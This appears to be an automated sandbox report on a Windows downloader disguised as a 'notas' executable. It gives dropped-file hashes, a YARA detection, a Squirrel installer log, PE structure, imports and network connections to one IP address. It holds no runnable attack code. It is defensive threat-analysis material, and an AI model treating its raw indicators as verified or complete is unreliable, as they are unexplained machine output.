                                                                  MD5:A560BAD9E373EA5223792D60BEDE2B13
                                                                  SHA1:82A0DA9B52741D8994F28AD9ED6CBD3E6D3538FA
                                                                  SHA-256:76359CD4B0349A83337B941332AD042C90351C2BB0A4628307740324C97984CC
                                                                  SHA-512:58A1B4E1580273E1E5021DD2309B1841767D2A4BE76AB4A7D4FF11B53FA9DE068F6DA67BF0DCCFB19B4C91351387C0E6E200A2A864EC3FA737A1CB0970C8242C
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\ContentPack\Update.exe, Author: Joe Security
                                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):22216
                                                                  Entropy (8bit):6.866938252411722
                                                                  Encrypted:false
                                                                  SSDEEP:384:fC8JWIqWCL7oJ0GftpBjpdanCZkscHRN7js7ll7PCDG/7:VFQo6in8CCs4j877
                                                                  MD5:CC09BB7FDEFC5763CCB3CF7DAE2D76CF
                                                                  SHA1:8610D07F27A961066134D728C82EB8E5F22E7E8F
                                                                  SHA-256:F8F00900EDBA2F64BF136DD0B6C83CAF07C72F24F3D49C78B7EA24757FDBC6D0
                                                                  SHA-512:0C518487AA5BAD357BD19AD09C6CFE0B8BB522D74A916D36CF01F1BD194B59CD8457784B199DC953570AD7EF8CE67464D066BDA51E31B055C9D4D5CA060D45C5
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):2695680
                                                                  Entropy (8bit):6.633366289954333
                                                                  Encrypted:false
                                                                  SSDEEP:24576:fx7mODrQkzw50Ri82xXPIBa3dNcH4Jd2J7zJdB1SKW/V9YXFp+59MxFYz3sjD8T0:fEcz2x7UDd/SKKApKMxFYzXTw7
                                                                  MD5:86E884477A0160A0915DA06649371E5F
                                                                  SHA1:1C6EA93F1288891A2552982D69A8343189DE80B7
                                                                  SHA-256:EE471A3847795729BD73D097D74ABA45400A291DD4DA08A9E3C77052AAC08884
                                                                  SHA-512:7A38792EFE388ED7B1CA53F6960758D7DEB99AD0D4D08C12F3BA0E68D8CD902624B1A1EEFE31073F8A86FB56CA3122EE15F405B99B99EDC68B2814952FCCC724
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):80800
                                                                  Entropy (8bit):6.781496286846518
                                                                  Encrypted:false
                                                                  SSDEEP:1536:FRk1rh/be3Z1bij+8xG+sQxzQF50I9VSHIecbWZOUXYOe0/zuvY:FRk/+Z1z8s+s+QrTmIecbWIA7//gY
                                                                  MD5:1E6E97D60D411A2DEE8964D3D05ADB15
                                                                  SHA1:0A2FE6EC6B6675C44998C282DBB1CD8787612FAF
                                                                  SHA-256:8598940E498271B542F2C04998626AA680F2172D0FF4F8DBD4FFEC1A196540F9
                                                                  SHA-512:3F7D79079C57786051A2F7FACFB1046188049E831F12B549609A8F152664678EE35AD54D1FFF4447428B6F76BEA1C7CA88FA96AAB395A560C6EC598344FCC7FA
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                  Category:dropped
                                                                  Size (bytes):1204336
                                                                  Entropy (8bit):7.998442627142358
                                                                  Encrypted:true
                                                                  SSDEEP:24576:CWQzq+aGgkz0SrQy75OYpk7LmMHseMOWsxam8p4/HND7mxcKizFWyT9IdgPSFBC:CJ9zey75OYpk7nMeMOBGulqCJ9I+PSFQ
                                                                  MD5:7BDBDE71A61EE412CB77156199EEDC46
                                                                  SHA1:652938A112187AEE90FAD5C30C9D7575C3783552
                                                                  SHA-256:BC4D61BE88A05E537CCB5E85B6517A73B7C7A191F18AA6B815E7349129568F09
                                                                  SHA-512:DD9F580D439EEDAE81C24A78EDF5B5A831D60CF6FFFE3BD10209F889CCA2F78916682450D7B089D56C6C6D762278F0384310DB2CA4040EDD37E33D8A0C31AE68
                                                                  Malicious:false
                                                                  Preview:PK (Zip archive, binary content); readable entry names: ContentPack.nuspec, lib/, lib/net48/, lib/net48/BumpFiles.exe
                                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):80
                                                                  Entropy (8bit):4.821762239033052
                                                                  Encrypted:false
                                                                  SSDEEP:3:DZS5jNDmHQaWuWQxL1EVvJxrG61:DZy5YQa3WWL18vjGq
                                                                  MD5:2974BFB739B24B645F7958ABA97741C4
                                                                  SHA1:7C874B7A39F81575653A4C11897DE01A7735406A
                                                                  SHA-256:3C4CF29D3FADA3AD626D0FBCC5C6087D206876B14CDC658947F02A058106E6BA
                                                                  SHA-512:6C59BB4F2B8D33B8FB9F8E3B3EDCAA5D972565464525B34BA405630D449201D13E0AE373A67BF5275DABF34C7F6287E56F1B932BD4242B00B330E828E8AECDC6
                                                                  Malicious:false
                                                                  Preview:.652938A112187AEE90FAD5C30C9D7575C3783552 ContentPack-1.0.0-full.nupkg 1204336
                                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):80
                                                                  Entropy (8bit):4.821762239033052
                                                                  Encrypted:false
                                                                  SSDEEP:3:DZS5jNDmHQaWuWQxL1EVvJxrG61:DZy5YQa3WWL18vjGq
                                                                  MD5:2974BFB739B24B645F7958ABA97741C4
                                                                  SHA1:7C874B7A39F81575653A4C11897DE01A7735406A
                                                                  SHA-256:3C4CF29D3FADA3AD626D0FBCC5C6087D206876B14CDC658947F02A058106E6BA
                                                                  SHA-512:6C59BB4F2B8D33B8FB9F8E3B3EDCAA5D972565464525B34BA405630D449201D13E0AE373A67BF5275DABF34C7F6287E56F1B932BD4242B00B330E828E8AECDC6
                                                                  Malicious:false
                                                                  Preview:.652938A112187AEE90FAD5C30C9D7575C3783552 ContentPack-1.0.0-full.nupkg 1204336
                                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):2751
                                                                  Entropy (8bit):5.372322730968244
                                                                  Encrypted:false
                                                                  SSDEEP:48:MxHKQwYHKGSI6ouHlJH/lEHuFKHKS+AHKKk7O6HFHKp1qHGIsCtHTHNHkbEHKxHO:iqbYqGSI6ou/fmOYqSJqKk7jlqpwmjCX
                                                                  MD5:E186D8CCFA77C108F5C38908EF87820C
                                                                  SHA1:47495A5AE5BE859D96CD2C2BD276A4B9A8B441C0
                                                                  SHA-256:E2CDF4184CFAFC04DCEB16A3AB1826DBB566B677590B5852A74411BA8B308142
                                                                  SHA-512:4173349453148C359F9E0DD698D7C8142A3198BD327722A3D5D5BD1C19F9695EFE732DB3769FB938FF3705AA3CC35A90EDFF2B2ED6F08F2901E376C6A3A1EE5E
                                                                  Malicious:false
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\WindowsBase\95a5c1baa004b986366d34856f0a5a75\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\ef4e808cb158d79ab9a2b049f8fab733\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):8764801
                                                                  Entropy (8bit):7.999974027044619
                                                                  Encrypted:true
                                                                  SSDEEP:196608:He+u4ln80jwTABJKUiD2iS1+sGRVc3PC3s3Z6oF+nzPZp:HeZ4N80jwG3W2xR2YP6MX43
                                                                  MD5:88EC493F2A48D234120348AEAB6D3808
                                                                  SHA1:3FB458578198B4691B409FFEABB99EDFE3827EAD
                                                                  SHA-256:4086FF865F27274805EEB8DF9504D381AF17582632FFFD02C81245A3119A3F34
                                                                  SHA-512:9A8CF59D76CBDEB0B03525A1D3E2869688F597F2A10751E13815CB827D92F12A7FCFAB0A32932A55386BE3026124BE9CA51FC2DF6A112D3B2E00141BEBA6F5F9
                                                                  Malicious:false
                                                                  Process:C:\Users\user\Desktop\0219830219301290321012notas.exe
                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                  Category:dropped
                                                                  Size (bytes):1204336
                                                                  Entropy (8bit):7.998442627142358
                                                                  Encrypted:true
                                                                  SSDEEP:24576:CWQzq+aGgkz0SrQy75OYpk7LmMHseMOWsxam8p4/HND7mxcKizFWyT9IdgPSFBC:CJ9zey75OYpk7nMeMOBGulqCJ9I+PSFQ
                                                                  MD5:7BDBDE71A61EE412CB77156199EEDC46
                                                                  SHA1:652938A112187AEE90FAD5C30C9D7575C3783552
                                                                  SHA-256:BC4D61BE88A05E537CCB5E85B6517A73B7C7A191F18AA6B815E7349129568F09
                                                                  SHA-512:DD9F580D439EEDAE81C24A78EDF5B5A831D60CF6FFFE3BD10209F889CCA2F78916682450D7B089D56C6C6D762278F0384310DB2CA4040EDD37E33D8A0C31AE68
                                                                  Malicious:false
                                                                  Preview:PK (Zip archive, binary content); readable entry names: ContentPack.nuspec, lib/, lib/net48/, lib/net48/BumpFiles.exe
                                                                  Process:C:\Users\user\Desktop\0219830219301290321012notas.exe
                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):80
                                                                  Entropy (8bit):4.821762239033052
                                                                  Encrypted:false
                                                                  SSDEEP:3:DZS5jNDmHQaWuWQxL1EVvJxrG61:DZy5YQa3WWL18vjGq
                                                                  MD5:2974BFB739B24B645F7958ABA97741C4
                                                                  SHA1:7C874B7A39F81575653A4C11897DE01A7735406A
                                                                  SHA-256:3C4CF29D3FADA3AD626D0FBCC5C6087D206876B14CDC658947F02A058106E6BA
                                                                  SHA-512:6C59BB4F2B8D33B8FB9F8E3B3EDCAA5D972565464525B34BA405630D449201D13E0AE373A67BF5275DABF34C7F6287E56F1B932BD4242B00B330E828E8AECDC6
                                                                  Malicious:false
                                                                  Preview:.652938A112187AEE90FAD5C30C9D7575C3783552 ContentPack-1.0.0-full.nupkg 1204336
                                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (387), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):2567
                                                                  Entropy (8bit):5.300453422370994
                                                                  Encrypted:false
                                                                  SSDEEP:48:2/tH+s73fLC9eeJXbIv4CBXOuqDZlBTuqDZp14jZ6WEBXAglBRgp14jZ6WEB1+BG:2lM9I53qDZlwqDZofE5AglHgofEm+4Ha
                                                                  MD5:3A527C7F08A96BC349DDD4042D918918
                                                                  SHA1:A2A9653D02238F496C1B241EC347241139EA2F08
                                                                  SHA-256:31DF199DEFA28F16CEF151B935874F2B3156D098FBBD5D0860B912EC4AF6046E
                                                                  SHA-512:8D4DC8D478766C4823DC679199F44D8EA87C23DA4A4F8F2905AF42B3C0FEE99BC084A6FA50E34BA6611FE974D94CC76FA4335A958717E2B350BF209B15F23A0B
                                                                  Malicious:false
                                                                  Preview:.[23/02/24 15:43:18] info: Program: Starting Squirrel Updater: --install . --rerunningWithoutUAC..[23/02/24 15:43:18] info: Program: Starting install, writing to C:\Users\user\AppData\Local\SquirrelTemp..[23/02/24 15:43:18] info: Program: About to install to: C:\Users\user\AppData\Local\ContentPack..[23/02/24 15:43:18] info: CheckForUpdateImpl: Reading RELEASES file from C:\Users\user\AppData\Local\SquirrelTemp..[23/02/24 15:43:18] info: CheckForUpdateImpl: First run, starting from scratch..[23/02/24 15:43:18] info: ApplyReleasesImpl: Writing files to app directory: C:\Users\user\AppData\Local\ContentPack\app-1.0.0..[23/02/24 15:43:18] info: LogHost: Rigging execution stub for BumpFiles_ExecutionStub.exe to C:\Users\user\AppData\Local\ContentPack\BumpFiles.exe..[23/02/24 15:43:18] info: ApplyReleasesImpl: Squirrel Enabled Apps: []..[23/02/24 15:43:18] warn: ApplyReleasesImpl: No apps are marked as Squirrel-aware! Going to run them all..[23/02/24 15:43:18] info: ApplyRelease
                                                                  Process:C:\Users\user\Desktop\0219830219301290321012notas.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1899520
                                                                  Entropy (8bit):5.894883178349122
                                                                  Encrypted:false
                                                                  SSDEEP:24576:pWltPuAnUCiag6CKM2zCy9sQuOjj1VgZej6GeS4lNrCze5qhYp4t9m2:0t3UCiag6CKM2zCyZuOjJaxSS5qh
                                                                  MD5:A560BAD9E373EA5223792D60BEDE2B13
                                                                  SHA1:82A0DA9B52741D8994F28AD9ED6CBD3E6D3538FA
                                                                  SHA-256:76359CD4B0349A83337B941332AD042C90351C2BB0A4628307740324C97984CC
                                                                  SHA-512:58A1B4E1580273E1E5021DD2309B1841767D2A4BE76AB4A7D4FF11B53FA9DE068F6DA67BF0DCCFB19B4C91351387C0E6E200A2A864EC3FA737A1CB0970C8242C
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, Author: Joe Security
                                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                  File Type:ISO-8859 text, with CR line terminators
                                                                  Category:dropped
                                                                  Size (bytes):4
                                                                  Entropy (8bit):2.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:9:9
                                                                  MD5:A7E0F8AC46398A7876D1E40DD52C2AAB
                                                                  SHA1:B66922B4E6F09E23C072E4AFF49C67C3121DD5AF
                                                                  SHA-256:05174BBF0D407087E45B12BAAE17117426852FF3A9E58D12A0EBB9A10B409743
                                                                  SHA-512:E6B93215582F7F4F5E9292273A9466B5D0CC3A4EA7D77AE42854203755441DD5EDBEFB11FE8890CAE7783E41E2EDBF61EC7B03D7E5E9870A7821D4016B095F79
                                                                  Malicious:false
                                                                  Preview:....
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):142
                                                                  Entropy (8bit):6.55447018279355
                                                                  Encrypted:false
                                                                  SSDEEP:3:DfVjzD2ZzXgE4dXC/FiYvyfgaPDlZqLDpVYngGbu/6Ry0s9rYdn:hnDEgRdSZEg8YDp1ERy0OAn
                                                                  MD5:57A37BD0840D0745A9481BCC25B5A792
                                                                  SHA1:E8B7C744981C0713DE5EBB308897EFCBD374FD11
                                                                  SHA-256:E2B2371F95D8D9CBFCA301AFF3441466E30453BBD37A42FA17DAF4D85AA7E627
                                                                  SHA-512:08AFA751874B49FB20ADBEC0C824609DAE0DECD6E747471EF8CB19FAE299A65D21ACC02185560669ED9E36CD74E2E4372B61E52EEF34D5785E9BBA3DC8FD431B
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Fri Feb 23 13:43:18 2024, mtime=Fri Feb 23 13:43:18 2024, atime=Fri Feb 23 13:43:18 2024, length=196096, window=hide
                                                                  Category:dropped
                                                                  Size (bytes):2278
                                                                  Entropy (8bit):3.766245034155764
                                                                  Encrypted:false
                                                                  SSDEEP:48:8dCaQLWFRsBFqxBtrBuorBBrBubZlqrBuYxSyA7EL/B2:8ovWrsB4BpBtBdB7B3xSyAgDB
                                                                  MD5:0E239E34C776893E2C82B9930B15A542
                                                                  SHA1:614CE5CA51D45E9FCFD517EFAE1D30C74D03C10B
                                                                  SHA-256:448006D188D9D4A49E5D3B0C9F6843FB1A67C2FEC92377DD1E3443693880583D
                                                                  SHA-512:BD40DD2D188ACF1AF412DC189A9526E090E685C0578EA4CE04761F0EBEAF71586D759F8654FAB2A3E8289F7689D204159DA59D4BA646F1DF3B8CE5B9A88C7B5D
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Fri Feb 23 13:43:18 2024, mtime=Fri Feb 23 13:43:19 2024, atime=Fri Feb 23 13:43:18 2024, length=196096, window=hide
                                                                  Category:dropped
                                                                  Size (bytes):2264
                                                                  Entropy (8bit):3.7757939614943954
                                                                  Encrypted:false
                                                                  SSDEEP:48:8DiCaQLWFR7BFqxBnrBuorBBrBubZlqrBuYxSyA7EL/B2:87vWr7B4BrBtBdB7B3xSyAgDB
                                                                  MD5:4AFBABFD2DFA85D75B20AC1A53359F7A
                                                                  SHA1:6AFD09168B42557CB68CAEE3CF8B5ABAD2F379FC
                                                                  SHA-256:46A4A84C328C01D4C1924F333723E8889586801F5DD19185887A91500D052605
                                                                  SHA-512:80921594B2CB33BB9F66831F25C44C4EA4DF2864F49D1C3B63857F2DAB0DF54A54B657A02ADF7E4F459A8623E17C245B5CAD1F7C8348DB04AE7266BBEE34597B
                                                                  Malicious:false
                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.963237042378313
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:0219830219301290321012notas.exe
                                                                  File size:2'102'272 bytes
                                                                  MD5:a548469585481a1b7f98c9b09d271349
                                                                  SHA1:677eabeb661d965c7d3d5ff6f6b9336e27b80b91
                                                                  SHA256:21340c04b12af92f3bd3dd076e5a4f20c0fe5558461b5ff3f848e5d5b7183322
                                                                  SHA512:b40102429700b056c01953414b3a8f4c86242ee3d98478a834cb49fcaeca0e668e9d297af67c48733eeaa5bda7f6d3962b2248ce1adadf5969ffea997ecfffc1
                                                                  SSDEEP:49152:UMBQcZoX44p0k4icOpl048bBIaPeF/BXoG05ChlszkSJl:UMBQWo7pZuOplcSas/poG0Cvs3
                                                                  TLSH:D7A5232273C4C175D4B706307AF9E8B599BEBD228E319A5BA395035C4D701C0DB6AB2F
                                                                  Icon Hash:13170f6d2d6d6d33
                                                                  Entrypoint:0x40ab5c
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x5F70D7D7 [Sun Sep 27 18:20:07 2020 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:6
                                                                  OS Version Minor:0
                                                                  File Version Major:6
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:6
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:e6f4169f2a5c3a8f93171d9f593bd22a
                                                                  Instruction
                                                                  call 00007FBA5948ED5Ch
                                                                  jmp 00007FBA5948E67Fh
                                                                  ret
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  push esi
                                                                  push dword ptr [ebp+08h]
                                                                  mov esi, ecx
                                                                  call 00007FBA5948E85Dh
                                                                  mov dword ptr [esi], 0041F45Ch
                                                                  mov eax, esi
                                                                  pop esi
                                                                  pop ebp
                                                                  retn 0004h
                                                                  and dword ptr [ecx+04h], 00000000h
                                                                  mov eax, ecx
                                                                  and dword ptr [ecx+08h], 00000000h
                                                                  mov dword ptr [ecx+04h], 0041F464h
                                                                  mov dword ptr [ecx], 0041F45Ch
                                                                  ret
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  push esi
                                                                  push dword ptr [ebp+08h]
                                                                  mov esi, ecx
                                                                  call 00007FBA5948E82Ah
                                                                  mov dword ptr [esi], 0041F478h
                                                                  mov eax, esi
                                                                  pop esi
                                                                  pop ebp
                                                                  retn 0004h
                                                                  and dword ptr [ecx+04h], 00000000h
                                                                  mov eax, ecx
                                                                  and dword ptr [ecx+08h], 00000000h
                                                                  mov dword ptr [ecx+04h], 0041F480h
                                                                  mov dword ptr [ecx], 0041F478h
                                                                  ret
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  push esi
                                                                  mov esi, ecx
                                                                  lea eax, dword ptr [esi+04h]
                                                                  mov dword ptr [esi], 0041F43Ch
                                                                  and dword ptr [eax], 00000000h
                                                                  and dword ptr [eax+04h], 00000000h
                                                                  push eax
                                                                  mov eax, dword ptr [ebp+08h]
                                                                  add eax, 04h
                                                                  push eax
                                                                  call 00007FBA5948FF6Ch
                                                                  pop ecx
                                                                  pop ecx
                                                                  mov eax, esi
                                                                  pop esi
                                                                  pop ebp
                                                                  retn 0004h
                                                                  lea eax, dword ptr [ecx+04h]
                                                                  mov dword ptr [ecx], 0041F43Ch
                                                                  push eax
                                                                  call 00007FBA5948FFB7h
                                                                  pop ecx
                                                                  ret
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  push esi
                                                                  mov esi, ecx
                                                                  lea eax, dword ptr [esi+04h]
                                                                  mov dword ptr [esi], 0041F43Ch
                                                                  push eax
                                                                  call 00007FBA5948FFA0h
                                                                  test byte ptr [ebp+08h], 00000001h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2932c | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2c000 | 0x1d6480 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x203000 | 0x190c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x27720 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1f398 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1f000 | 0x1a4 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x28ef0 | 0xe0 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x1d32b | 0x1d400 | 723597f58d5674921108e642a8e1b5b4 | False | 0.5962540064102564 | data | 6.658318567238198 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x1f000 | 0xacae | 0xae00 | fa1645fd03dda975b8bd67904b34af32 | False | 0.44526760057471265 | data | 4.948544868021258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x2a000 | 0x1870 | 0xe00 | f8724007e5d2ce85c65b5408a736d005 | False | 0.21484375 | data | 3.016754020922221 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x2c000 | 0x1d6480 | 0x1d6600 | 856b9bfbfd58402a14969c3b0c3d5a17 | False | 0.9935229745216583 | data | 7.997560884030563 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x203000 | 0x190c | 0x1a00 | fca0dc86189b5b127d85095ebd6abd95 | False | 0.7630709134615384 | data | 6.514362877721557 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
DATA | 0x2c340 | 0x1d37b4 | Zip archive data, at least v2.0 to extract, compression method=deflate | English | United States | 1.0003108978271484
FLAGS | 0x1ffaf4 | 0xc | data | English | United States | 1.6666666666666667
RT_ICON | 0x1ffb00 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.21774193548387097
RT_ICON | 0x1ffde8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.11597472924187725
RT_ICON | 0x200690 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.21774193548387097
RT_ICON | 0x200978 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.11597472924187725
RT_STRING | 0x201220 | 0x418 | data | English | United States | 0.3148854961832061
RT_STRING | 0x201638 | 0x604 | data | English | United States | 0.21363636363636362
RT_STRING | 0x201c3c | 0x152 | data | English | United States | 0.5591715976331361
RT_GROUP_ICON | 0x201d90 | 0x22 | data | English | United States | 1.0588235294117647
RT_GROUP_ICON | 0x201db4 | 0x22 | data | English | United States | 1.088235294117647
RT_VERSION | 0x201dd8 | 0x2c0 | data | English | United States | 0.46448863636363635
RT_MANIFEST | 0x202098 | 0x3e7 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (939), with CRLF line terminators | English | United States | 0.5145145145145145
DLL | Import
KERNEL32.dll | LoadResource, FindResourceW, lstrlenW, GetProcAddress, GetModuleHandleW, DeleteCriticalSection, GetTempPathW, GetLastError, GetTempFileNameW, MoveFileW, WaitForSingleObject, GetExitCodeProcess, CloseHandle, DeleteFileW, GetModuleFileNameW, GetCurrentProcess, LoadLibraryW, FreeLibrary, InitializeCriticalSectionEx, GetFileAttributesW, CreateFileW, SetFilePointer, ReadFile, VerSetConditionMask, GetCurrentDirectoryW, MultiByteToWideChar, LocalFileTimeToFileTime, WideCharToMultiByte, CreateDirectoryW, WriteFile, SetFileTime, FreeResource, SizeofResource, LockResource, CreateProcessW, GetSystemDirectoryW, SetDefaultDllDirectories, GetCurrentThreadId, DecodePointer, RaiseException, LeaveCriticalSection, EnterCriticalSection, lstrcmpiW, LoadLibraryExW, GetConsoleMode, GetConsoleCP, SystemTimeToFileTime, VerifyVersionInfoW, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsDebuggerPresent, OutputDebugStringW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ExitProcess, GetModuleHandleExW, GetStdHandle, HeapFree, HeapAlloc, GetFileType, CompareStringW, LCMapStringW, HeapSize, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, GetProcessHeap, SetStdHandle, GetStringTypeW, GetFileSizeEx, SetFilePointerEx, FlushFileBuffers, WriteConsoleW
SHLWAPI.dll | PathIsUNCW
COMCTL32.dll | InitCommonControlsEx
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                  Feb 23, 2024 15:43:23.861152887 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:23.861476898 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:23.861496925 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:23.861521006 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:23.861557007 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:23.861573935 CET443497043.5.232.21192.168.2.5
                                                                  Feb 23, 2024 15:43:23.861596107 CET49704443192.168.2.53.5.232.21
                                                                  Feb 23, 2024 15:43:23.861613035 CET49704443192.168.2.53.5.232.21
